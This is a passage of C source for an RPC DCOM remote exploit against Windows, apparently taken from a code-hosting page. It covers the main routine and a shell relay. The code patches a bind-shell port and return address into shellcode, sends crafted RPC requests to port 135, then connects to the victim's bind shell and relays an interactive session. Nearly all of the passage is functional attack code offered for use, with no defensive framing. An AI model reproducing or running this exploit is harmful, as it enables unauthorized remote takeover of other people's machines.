📄 winrpcdcom2.c
字号:
{
printf("[-] Connection lost..\n");
exit(1);
}
if(write(1, rb, i) < 0) break;
}
if(FD_ISSET(0, &fdreadme))
{
if((i = read(0, rb, sizeof(rb))) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if (send(sockfd, rb, i, 0) < 0) break;
}
usleep(10000);
}
printf("[-] Connection closed by foreign host..\n");
exit(0);
}
int main(int argc, char **argv)
{
int len, len1, sockfd, c, a;
unsigned long ret;
unsigned short port = 135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
struct hostent *he;
struct sockaddr_in their_addr;
static char *hostname=NULL;
if(argc<2)
{
usage(argv[0]);
}
while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
{
switch (c)
{
case 'd':
hostname = optarg;
break;
case 't':
type = atoi(optarg);
if((type > 1) || (type < 0))
{
printf("[-] Select a valid target:\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);
return 1;
}
break;
case 'r':
targets[type].ret = strtoul(optarg, NULL, 16);
break;
case 'p':
port = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
case 'l':
lportl = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
default:
usage(argv[0]);
return 1;
}
}
if(hostname==NULL)
{
printf("[-] Please enter a hostname with -d\n");
exit(1);
}
printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
printf("[+] Resolving host..\n");
if((he = gethostbyname(hostname)) == NULL)
{
printf("[-] gethostbyname: Couldnt resolve hostname\n");
exit(1);
}
printf("[+] Done.\n");
printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n",
targets[type].os, hostname, port, lportl, targets[type].ret);
/* drg */
lportl=htons(lportl);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&sc[471],&lport,4);
memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);
their_addr.sin_family = AF_INET;
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
their_addr.sin_port = htons(port);
if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("[-] Socket failed");
return(0);
}
if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
perror("[-] Connect failed");
return(0);
}
/* xfocus start */
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);
*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
/* end xfocus */
if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
{
perror("[-] Send failed");
return(0);
}
len=recv(sockfd, buf1, 1000, 0);
if (send(sockfd,buf2,len1,0)== -1)
{
perror("[-] Send failed");
return(0);
}
close(sockfd);
sleep(1);
their_addr.sin_family = AF_INET;
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
their_addr.sin_port = lportl;
if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("[-] Socket failed");
return(0);
}
if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf("[-] Couldnt connect to bindshell, possible reasons:\n");
printf("1:Host is firewalled\n");
printf("2:Exploit failed\n");
return(0);
}
printf("[+] Connected to bindshell..\n\n");
sleep(2);
printf("-- bling bling --\n\n");
con(sockfd);
return(0);
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -